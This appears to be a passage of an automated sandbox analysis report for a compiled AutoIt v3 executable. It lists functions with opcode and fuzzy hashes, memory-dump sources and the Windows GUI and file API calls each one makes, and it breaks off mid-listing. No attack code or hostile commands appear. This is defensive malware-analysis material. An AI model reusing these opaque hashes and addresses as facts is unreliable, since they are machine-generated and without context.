• Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
• Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
• Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
• Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
• Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
• Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
• Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
• Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                              • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 004593D7
                                                                              • DeleteObject.GDI32(?), ref: 004593F1
                                                                              • DestroyWindow.USER32(?), ref: 00459407
                                                                              • GetDesktopWindow.USER32 ref: 0045942A
                                                                              • GetWindowRect.USER32(00000000), ref: 00459431
                                                                              • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                              • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                              • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                              • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                              • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                              • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                              • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                              • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                              • _wcslen.LIBCMT ref: 00459800
                                                                              • _wcscpy.LIBCMT ref: 0045981F
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                              • GetDC.USER32(?), ref: 004598DE
                                                                              • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                              • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                              • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 4040870279-2373415609
                                                                              • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                              • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00441E64
                                                                              • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                              • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                              • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                              • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                              • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                              • DeleteObject.GDI32(?), ref: 00441F1B
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                              • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                              • String ID:
                                                                              • API String ID: 69173610-0
                                                                              • Opcode ID: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                              • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                              • Opcode Fuzzy Hash: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                              • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-3360698832
                                                                              • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                              • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                              APIs
                                                                              • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                              • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                              • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                              • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                              • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • GetWindowLongW.USER32 ref: 00433E8A
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                              • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                              • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                              • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                              • SelectObject.GDI32(?,?), ref: 00433F63
                                                                              • DeleteObject.GDI32(?), ref: 00433F70
                                                                              • SelectObject.GDI32(?,?), ref: 00433F78
                                                                              • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                              • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                              • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1582027408-0
                                                                              • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                              • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                              • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                              • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00456692
                                                                              • GetDesktopWindow.USER32 ref: 004566AA
                                                                              • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                              • DestroyWindow.USER32(?), ref: 00456731
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                              • IsWindowVisible.USER32(?), ref: 00456812
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                              • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                              • GetMonitorInfoW.USER32 ref: 00456894
                                                                              • CopyRect.USER32(?,?), ref: 004568A8
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                              • String ID: ($,$tooltips_class32
                                                                              • API String ID: 541082891-3320066284
                                                                              • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                              • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00454DCF
                                                                              • _wcslen.LIBCMT ref: 00454DE2
                                                                              • __wcsicoll.LIBCMT ref: 00454DEF
                                                                              • _wcslen.LIBCMT ref: 00454E04
                                                                              • __wcsicoll.LIBCMT ref: 00454E11
                                                                              • _wcslen.LIBCMT ref: 00454E24
                                                                              • __wcsicoll.LIBCMT ref: 00454E31
                                                                                • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                              • DestroyIcon.USER32(?), ref: 00454FA2
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 2511167534-1154884017
                                                                              • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                              • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                              • _wcslen.LIBCMT ref: 00436B79
                                                                              • _wcscpy.LIBCMT ref: 00436B9F
                                                                              • _wcscat.LIBCMT ref: 00436BC0
                                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                              • _wcscat.LIBCMT ref: 00436C2A
                                                                              • _wcscat.LIBCMT ref: 00436C31
                                                                              • __wcsicoll.LIBCMT ref: 00436C4B
                                                                              • _wcsncpy.LIBCMT ref: 00436C62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 1503153545-1459072770
                                                                              • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                              • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                              • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                              • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                              APIs
                                                                                • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                              • _fseek.LIBCMT ref: 004527FC
                                                                              • __wsplitpath.LIBCMT ref: 0045285C
                                                                              • _wcscpy.LIBCMT ref: 00452871
                                                                              • _wcscat.LIBCMT ref: 00452886
                                                                              • __wsplitpath.LIBCMT ref: 004528B0
                                                                              • _wcscat.LIBCMT ref: 004528C8
                                                                              • _wcscat.LIBCMT ref: 004528DD
                                                                              • __fread_nolock.LIBCMT ref: 00452914
                                                                              • __fread_nolock.LIBCMT ref: 00452925
                                                                              • __fread_nolock.LIBCMT ref: 00452944
                                                                              • __fread_nolock.LIBCMT ref: 00452955
                                                                              • __fread_nolock.LIBCMT ref: 00452976
                                                                              • __fread_nolock.LIBCMT ref: 00452987
                                                                              • __fread_nolock.LIBCMT ref: 00452998
                                                                              • __fread_nolock.LIBCMT ref: 004529A9
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
